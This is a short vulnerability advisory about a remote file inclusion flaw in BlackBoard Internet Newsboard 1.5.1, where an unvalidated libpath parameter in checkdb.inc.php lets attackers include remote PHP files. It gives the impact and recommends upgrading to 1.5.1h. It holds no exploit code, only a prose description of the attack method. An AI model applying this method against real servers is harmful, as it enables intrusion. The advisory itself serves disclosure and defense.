[原文]PHP remote file inclusion vulnerability in BlackBoard 1.5.1 allows remote attackers to execute arbitrary PHP code by modifying the libpath parameter (incorrectly called "libpach") to reference a URL on a remote web server that contains _more.php, as demonstrated using checkdb.inc.php.
Yves Goergen BlackBoard Internet Newsboard System checkdb.inc.php libpath Parameter Remote File Inclusion
Remote / Network Access
Loss of Confidentiality,
Loss of Integrity
Yves Goergen BlackBoard Internet Newsboard contains a flaw that may allow a malicious user to execute arbitrary commands on the server. The issue is triggered when "checkdb.inc.php" does not validate user supplied input to the $libpath variable. This allows an attacker to include an arbitrary file from a remote server which contains commands that will be executed with the same privileges as the running web server.
Upgrade to version 1.5.1h or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.